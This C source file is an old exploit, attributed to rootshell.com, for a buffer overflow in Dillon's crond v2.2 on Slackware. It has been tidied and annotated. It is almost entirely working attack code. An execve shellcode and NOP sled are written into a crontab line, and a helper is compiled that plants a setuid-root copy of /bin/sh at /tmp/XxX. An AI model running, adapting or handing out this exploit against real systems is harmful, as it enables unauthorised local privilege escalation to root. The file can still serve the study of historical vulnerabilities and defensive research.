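/* [ http://www.rootshell.com/ ] */
/*
 * Dillon's Crond v2.2 exploit (Slackware /usr/sbin/crond).
 *
 * There is a buffer overflow in crond's fdprintf() in subs.c (the
 * vsprintf() call).  The overflow was discovered by the KSRT team.
 *
 * The overflow is only reachable when crond runs WITHOUT the -l option.
 * Slackware's /etc/rc.d/rc.M starts it as
 *
 *     /usr/sbin/crond -l10
 *
 * so on a default install this program achieves nothing.  If crond is
 * running without -l, root can be obtained.
 *
 * Usage: compile, run (optionally with a stack offset as the single
 * argument), then look for a setuid-root shell at /tmp/XxX about one
 * minute later.  crond has also been observed to segfault when X is
 * running.
 *
 * Review notes:
 *   - i386 only: the shellcode and get_esp() assume a 32-bit x86 stack;
 *     on a 64-bit build the 8-byte return address would embed NUL bytes
 *     and truncate the crontab line.
 *   - /tmp/xo.c, /tmp/xo and /tmp/XxX are fixed, predictable names in a
 *     world-writable directory.  The helper source is created with
 *     O_CREAT|O_EXCL, so a pre-planted symlink makes this fail instead of
 *     being followed, but the compiler output and the resulting mode-4755
 *     root shell still live at well-known paths reachable by every local
 *     user.  Remove /tmp/XxX as soon as you are done.
 *   - The path /tmp/xo is also embedded in the shellcode string below;
 *     HELPER_BIN must stay in sync with it.
 *   - Use this responsibly, only on systems you are authorised to test.
 */
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define DEFAULT_OFFSET      560   /* subtracted from %esp to guess the return address */
#define DEFAULT_BUFFER_SIZE 980   /* only used if the passwd lookup in calc_bs() fails */
#define TOTAL_BUFFER        4096  /* allocation size for the crontab line */
#define RET_COPIES          2     /* copies of the return address appended to the payload */

#define HELPER_SRC   "/tmp/xo.c"  /* source of the program the shellcode execs */
#define HELPER_BIN   "/tmp/xo"    /* must match the path embedded in the shellcode */
#define SUID_SHELL   "/tmp/XxX"   /* where the helper plants the setuid shell */
#define CRONTAB_FILE "r00t"       /* temporary crontab in the current directory */

/* execve("/tmp/xo") shellcode; contains no NUL bytes, so it survives "%s". */
static const char shellcode[] =
    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
    "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
    "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
    "\xd7\xff\xff\xff/tmp/xo";

/* C source of the helper that the shellcode executes as root. */
static const char helper_src[] =
    "#include <stdio.h>\n"
    "#include <stdlib.h>\n"
    "int main(void) {\n"
    "\tsystem(\"/bin/cp /bin/sh " SUID_SHELL "\");\n"
    "\tsystem(\"chown root " SUID_SHELL "\");\n"
    "\tsystem(\"chmod 4755 " SUID_SHELL "\");\n"
    "\treturn 0;\n"
    "}\n";

/*
 * Return the current stack pointer (i386 only).  The original relied on
 * the value being left in %eax with no return statement; an explicit
 * output operand makes the result well-defined.
 */
static long get_esp(void)
{
    long sp;

    __asm__ volatile ("movl %%esp, %%eax" : "=a" (sp));
    return sp;
}

/*
 * Size the NOP-sled+shellcode region from the length of the invoking
 * user's name.  The original author found the overflow offset shifts by
 * one per character of username -- presumably because the overflowed
 * buffer in crond holds the username; not verified here.
 * Leaves *bs_ptr untouched (the default) if the passwd lookup fails.
 */
void calc_bs(int *bs_ptr)
{
    struct passwd *pw = getpwuid(getuid());

    if (pw == NULL || pw->pw_name == NULL) {
        fprintf(stderr, "getpwuid(%lu) failed, keeping buffer size %d\n",
                (unsigned long)getuid(), *bs_ptr);
        return;
    }
    *bs_ptr = 986 - (int)strlen(pw->pw_name);
}

/*
 * Parse the optional offset argument.  Returns 0 and stores the value in
 * *out, or -1 if s is not a complete decimal integer that fits in an int.
 */
static int parse_offset(const char *s, int *out)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v < INT_MIN || v > INT_MAX)
        return -1;
    *out = (int)v;
    return 0;
}

/*
 * Lay out the crontab line in buff: (bs - shellcode length) NOPs, the
 * shellcode, then RET_COPIES copies of ret, NUL-terminated.
 * Returns the payload length (excluding the NUL), or 0 if bs is too small
 * to hold the shellcode or the line would not fit in cap bytes.
 */
static size_t build_payload(char *buff, size_t cap, int bs, unsigned long ret)
{
    const size_t sc_len = sizeof shellcode - 1;
    size_t nops, total;
    char *p = buff;
    int i;

    if (bs < 0 || (size_t)bs < sc_len)
        return 0;
    nops = (size_t)bs - sc_len;
    total = (size_t)bs + RET_COPIES * sizeof ret + 1;
    if (total > cap)
        return 0;

    memset(p, 0x90, nops);                 /* NOP sled */
    p += nops;
    memcpy(p, shellcode, sc_len);
    p += sc_len;
    for (i = 0; i < RET_COPIES; i++) {     /* guessed saved return address */
        memcpy(p, &ret, sizeof ret);
        p += sizeof ret;
    }
    *p = '\0';
    return total - 1;
}

/* Write all of buf to fd, retrying on short writes.  Returns 0 or -1. */
static int write_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t w = write(fd, buf, len);

        if (w < 0)
            return -1;
        buf += w;
        len -= (size_t)w;
    }
    return 0;
}

/*
 * Create path with O_CREAT|O_EXCL (fails rather than following a symlink
 * planted by another /tmp user) and write helper_src into it.
 * Returns 0 on success, -1 after printing the error.
 */
static int write_helper_source(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    int rc;

    if (fd < 0) {
        perror(path);
        return -1;
    }
    rc = write_all(fd, helper_src, sizeof helper_src - 1);
    if (close(fd) < 0)
        rc = -1;
    if (rc < 0) {
        perror(path);
        unlink(path);
    }
    return rc;
}

/*
 * Entry point.  argv[1], if present, overrides DEFAULT_OFFSET.
 * Builds the helper binary, then installs a crontab whose single line
 * overflows crond when it reloads.  Exits non-zero on any failure.
 */
int main(int argc, char **argv)
{
    int rc = EXIT_FAILURE;
    int ofs = DEFAULT_OFFSET;
    int bs = DEFAULT_BUFFER_SIZE;
    int ok;
    char *buff;
    FILE *fp;

    if (argc == 2 && parse_offset(argv[1], &ofs) < 0) {
        fprintf(stderr, "usage: %s [offset]\n", argv[0]);
        return EXIT_FAILURE;
    }
    calc_bs(&bs);

    buff = malloc(TOTAL_BUFFER);
    if (buff == NULL) {
        perror("malloc");
        return EXIT_FAILURE;
    }

    /* get_esp() is sampled from main's frame, as the original did. */
    if (build_payload(buff, TOTAL_BUFFER, bs,
                      (unsigned long)(get_esp() - ofs)) == 0) {
        fprintf(stderr, "buffer size %d cannot hold the payload\n", bs);
        goto out;
    }

    /* Step 1: build the helper the shellcode execs (plants the suid shell). */
    if (write_helper_source(HELPER_SRC) < 0)
        goto out;
    if (system("cc -o " HELPER_BIN " " HELPER_SRC) != 0) {
        fprintf(stderr, "compiling %s failed\n", HELPER_SRC);
        unlink(HELPER_SRC);
        goto out;
    }
    unlink(HELPER_SRC);

    /* Step 2: install the crontab line that overflows crond. */
    fp = fopen(CRONTAB_FILE, "w");
    if (fp == NULL) {
        perror("fopen");
        goto out;
    }
    ok = fputs(buff, fp) != EOF && fputc('\n', fp) != EOF;
    if (fclose(fp) != 0)
        ok = 0;
    if (!ok) {
        perror(CRONTAB_FILE);
        unlink(CRONTAB_FILE);
        goto out;
    }
    if (system("/usr/bin/crontab " CRONTAB_FILE) != 0)
        fprintf(stderr, "warning: crontab exited with an error; "
                        "the crontab may not have been installed\n");
    unlink(CRONTAB_FILE);

    printf("Now wait about 1 minute and look\n");
    printf("for the suid shell -> " SUID_SHELL "\n");
    rc = 0;

out:
    free(buff);
    return rc;
}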